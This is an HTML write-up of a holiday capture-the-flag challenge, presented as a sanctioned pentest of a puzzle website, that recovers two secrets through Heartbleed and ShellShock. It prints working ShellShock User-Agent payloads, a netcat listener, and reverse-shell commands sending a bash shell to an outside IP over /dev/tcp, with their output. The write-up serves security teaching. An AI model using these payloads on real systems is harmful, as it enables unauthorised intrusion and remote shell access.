<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="generator" content="AsciiDoc 8.6.9">
<title>PenTest Engagement of <a href="http://www.scrooge-and-marley.com/">http://www.scrooge-and-marley.com/</a></title>
</head>
<body>
<h1>PenTest Engagement of <a href="http://www.scrooge-and-marley.com/">http://www.scrooge-and-marley.com/</a></h1>
<p>
</p>
<hr>
<h2><a name="_request"></a>Request</h2>
<p>What two secrets did the Ghost of Hacking Present deposit on the <a href="http://www.scrooge-and-marley.com">http://www.scrooge-and-marley.com</a> website?</p>
<hr>
<h2><a name="_rules_of_engagement"></a>Rules of Engagement</h2>
<p>You have permission to attack that website (TCP port 80 and 443 only) with the goal of retrieving those secrets, but please do not attempt any denial of service attacks or performance hogging attacks on that machine.</p>
<hr>
<h2><a name="_results"></a>Results</h2>
<p>After 2 successful attacks via ShellShock and Heartbleed we were able to determine the two following secrets:</p>
<pre><code>Website Secret #1=Hacking can be noble.
Website Secret #2: Use your skills for good.</code></pre>
<hr>
<h2><a name="_methodology"></a>Methodology</h2>
<h3><a name="_recon"></a>Recon</h3>
<p>Initial recon using DNS and WHOIS indicate that the server is hosted at Linode and the domain is owned by our illustrious master of enigmas, Ed Skoudis. Those give us little to work from so we&#8217;ll continue on to examining the website. We are limited to port 80 and 443 so let&#8217;s examine the web certificate.</p>
<h3><a name="_analysis_and_exploitation"></a>Analysis and Exploitation</h3>
<h4><a name="_ssl_analysis"></a>SSL Analysis</h4>
<pre><code>openssl s_client -host www.scrooge-and-marley.com -p 443 -showcerts &lt; /dev/null</code></pre>
<pre><code>CONNECTED(00000003)
depth=0 /O=TurnKey Linux/OU=Software appliances
verify error:num=18:self signed certificate
verify return:1
depth=0 /O=TurnKey Linux/OU=Software appliances
verify return:1
---
Certificate chain
 0 s:/O=TurnKey Linux/OU=Software appliances
   i:/O=TurnKey Linux/OU=Software appliances
-----BEGIN CERTIFICATE-----
MIICOjCCAaOgAwIBAgIJANx1C9gxweJ+MA0GCSqGSIb3DQEBBQUAMDYxFjAUBgNV
BAoMDVR1cm5LZXkgTGludXgxHDAaBgNVBAsME1NvZnR3YXJlIGFwcGxpYW5jZXMw
HhcNMTQxMjA1MTgyNjI3WhcNMjQxMjAyMTgyNjI3WjA2MRYwFAYDVQQKDA1UdXJu
S2V5IExpbnV4MRwwGgYDVQQLDBNTb2Z0d2FyZSBhcHBsaWFuY2VzMIGfMA0GCSqG
SIb3DQEBAQUAA4GNADCBiQKBgQDTQe4MUTkiwB0s2QJhdvFEvL1aWePoUAoFYq3V
Lle0qxfdR2bOgWpdeltigpC5sXdguKESSoVF4ycGD9oUMvpjnYxfe9lc9cY/Hp34
MPMrqZNs0P1+gPS7/h3kregS4JdmR9DwxQzKxoI8PbRqhmnmKs5H3eablgBhKmck
hE7+HwIDAQABo1AwTjAdBgNVHQ4EFgQUf17RynY9KTWhE4S2FykI7BIKCggwHwYD
VR0jBBgwFoAUf17RynY9KTWhE4S2FykI7BIKCggwDAYDVR0TBAUwAwEB/zANBgkq
hkiG9w0BAQUFAAOBgQCxCc+MHKgJyoS3B4lP++Ibz/pd8zlUZIgDka7SHRDGqdw2
SFk5YwpnekPL+CnQDu/uLbhUBlLWPqXs0lgccL8wNJGoz2f5VUvHXbNoafrnTKVb
6uB2umlPrBhgR/z/aXVUB0tUZm7CsyvEwwzyCVHQLzrgVPIJnPnVt4ZaU1rMhA==
-----END CERTIFICATE-----
---
Server certificate
subject=/O=TurnKey Linux/OU=Software appliances
issuer=/O=TurnKey Linux/OU=Software appliances
---
No client certificate CA names sent
---
SSL handshake has read 1145 bytes and written 328 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: F6D5ABCCEC824663B1991AA2B8138A0F246B38AB153E22355DA3B4901B91BE68
    Session-ID-ctx:
    Master-Key: 41ACEB96C46729A2FA72E32B0433B067F71ADFC31F1BC307EE882AFA1129DB1808E8AC5E4D7AF43E4B74A7CB25B8C41C
    Key-Arg   : None
    Start Time: 1418665613
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---
DONE</code></pre>
<p>This certificate provides little to no useful information. The subject name is generic and does not point to any specific entity or software to exploit. Let&#8217;s continue on.</p>
<p>Since this is SSL let&#8217;s examine the possibility of Heartbleed. There are a number of tools out there to test this out. Let&#8217;s try this one <a href="https://gist.github.com/eelsivart/10174134">found on github</a>.</p>
<pre><code>/heartbleed.py www.scrooge-and-marley.com -p 443 -a results</code></pre>
<p>This outputs an ascii file with these contents:</p>
<pre><code>.@....SC[...r....+..H...9...
....w.3....f...
.".!.9.8.........5...............^M...
.........3.2.....E.D...../...A.................................I.........
.4.2...^M...........
...................................#.......ved%20it%20seemed%20to%20scatter%20gloom%20and%20mystery.%0A%0AIt%20was%20shrouded%20in%20a%20deep%20black%20garment%2C%20which%20concealed%20its%20head%2C%20its%20face%2C%20its%20form%2C%20and%20left%20nothing%20of%20it%20visible%20save%20one%20outstretched%20hand.%20But%20for%20this%20it%20would%20have%20been%20difficult%20to%20detach%20its%20figure%20from%20the%20night%2C%20and%20separate%20it%20from%20the%20darkness%20by%20which%20it%20was%20surrounded.%20&amp;Website%20Secret%20%231=Hacking%20can%20be%20noble%2e........S...G..Vh.&amp;l</code></pre>
<p>Immediately we see this line:</p>
<pre><code>Website%20Secret%20%231=Hacking%20can%20be%20noble%2e</code></pre>
<p>which decodes to</p>
<pre><code>Website Secret #1=Hacking can be noble.</code></pre>
<h4><a name="_png_analysis"></a>PNG analysis</h4>
<p>We start to examine links and media on the site. There are 4 png background files. They provide no useful information in exif data or strings analysis.</p>
<p>Using the program <em>exiftool</em> at the command line there was no useful information provided from the 4 png files.</p>
<pre><code>wget http://www.scrooge-and-marley.com/1.png
wget http://www.scrooge-and-marley.com/2.png
wget http://www.scrooge-and-marley.com/3.png
wget http://www.scrooge-and-marley.com/4.png

exiftool *.png</code></pre>
<h4><a name="_mp3_ogg_analysis"></a>MP3/OGG Analysis</h4>
<p>There are two versions of the <em>special message</em> from scrooge on the website. We download both and run exiftool on these.</p>
<pre><code>wget http://www.scrooge-and-marley.com/a.mp3
wget http://www.scrooge-and-marley.com/a.ogg

exiftool a.mp3 a.ogg</code></pre>
<p>Running exiftool on these does not provide any useful information.</p>
<p>As they are different formats let&#8217;s check them for any secret messages embedded in the file. We load the file into Adobe&#8217;s Audition. We create a multi-track audio project. We invert a.mp3 and move that into the multi-track file. We then move the ogg file into the multi-track file unchanged. We zoom in and line the two files up as close as we can possibly can and play the result. There was nothing that jumped out of the merged audio.</p>
<p><a href="scrooge_merge.mp3">Merged MP3</a></p>
<p>There does not appear to be anything else we can do at this time with the audio files. Let&#8217;s spider the host and see what we can find.</p>
<h4><a name="_burp_suite_analysis"></a>Burp Suite analysis</h4>
<p>To spider the host let&#8217;s switch to Burp Suite. We start up burp suite and set our browser&#8217;s proxy to localhost:8080 and visit the site. In Burp Suite under Proxy&#8594;Intercept we can see the inital request for the root of <a href="http://www.scrooge-and-marley.com/">http://www.scrooge-and-marley.com/</a>. We click on <em>Action</em> and select <em>Send to Spider</em>. We switch to the <em>Target</em> tab and under <em>Site map</em> we right click on <em>http://www.scrooge-and-marley.com/</em>. Select <em>Spider this host</em> from the drop down menu and a list of spidered urls should appear to the right. Immediately the <em>/cgi-bin/submit.sh</em> jumps out considering the ShellShock vulnerabilites from the last year. Let&#8217;s visit this site and attempt to exploit this vulnerability.</p>
<p>In our proxied browser we visit <em>http://www.scrooge-and-marley.com/cgi-bin/submit.sh</em>. In Burp Suite under <em>Proxy</em>&#8594;'Intercept' we click on <em>Action</em> then <em>Send to Repeater</em> then switch to the <em>Repeater</em> tab. Let&#8217;s start with some basic shellshock exploits. We replace the value for the <em>User-Agent</em> header with:</p>
<pre><code>() { :; }; /bin/ls</code></pre>
<p>We get a 500 error. This does indicate that something is happening but at this point it is a blind injection. We will need to see if it&#8217;s actually doing something. We open a local port to listen from using netact:</p>
<pre><code>nc -l 4444 -vvv</code></pre>
<p>We modify the User-Agent to send a message to our listener.</p>
<pre><code>User-Agent: () { :; }; echo 'hello' &gt; /dev/tcp/10.112.101.110/4444</code></pre>
<p>We see this on our receiver.</p>
<pre><code>Connection from 23.239.15.124 port 4444 [tcp/krb524] accepted
hello</code></pre>
<p>Now we attempt to create a reverse shell. Throught trial and error the following line worked.</p>
<pre><code>User-Agent: () { :; }; /bin/bash -i &gt;&amp; /dev/tcp/10.112.101.110/4444 0&gt;&amp;1</code></pre>
<p>Now we have a shell</p>
<pre><code>Connection from 23.239.15.124 port 4444 [tcp/krb524] accepted
bash: no job control in this shell
bash-4.2$</code></pre>
<p>Immediately we notice a problem. There are no basic shell programs to explore the system.</p>
<pre><code>bash-4.2$ ls
ls
bash: ls: command not found</code></pre>
<p>The same for uname, dir, etc. cd does work, and bash does appear to be present. echo also apparently works. We can use echo to explore. pwd also works.</p>
<pre><code>bash-4.2$ echo *
echo *
submit.sh
bash-4.2$ pwd
pwd
/var/www/cgi-bin
bash-4.2$ cd /
cd /
bash-4.2$ echo *
echo *
bin dev etc lib lib64 run sbin secret selinux usr var</code></pre>
<p>The file <em>secret</em> jumps out at us but the simple tools cat, less, more don&#8217;t work. Let&#8217;s exploit what we do have access to, specifically bash. We recraft our exploit line to the following:</p>
<pre><code>User-Agent: () { :; }; /bin/bash --verbose --init-file /secret -i &gt;&amp; /dev/tcp/10.112.101.110/4444 0&gt;&amp;1</code></pre>
<p>This is the following result from our listener:</p>
<pre><code>Connection from 23.239.15.124 port 4444 [tcp/krb524] accepted
bash: no job control in this shell
Website Secret #2: Use your skills for good.
bash: Website: command not found</code></pre>
<p>This reveals our second secret <em>Website Secret #2: Use your skills for good.</em></p>
<p></p>
<p></p>
<hr><p><small>
Last updated 2015-01-06 09:45:57 CST
</small></p>
</body>
</html>
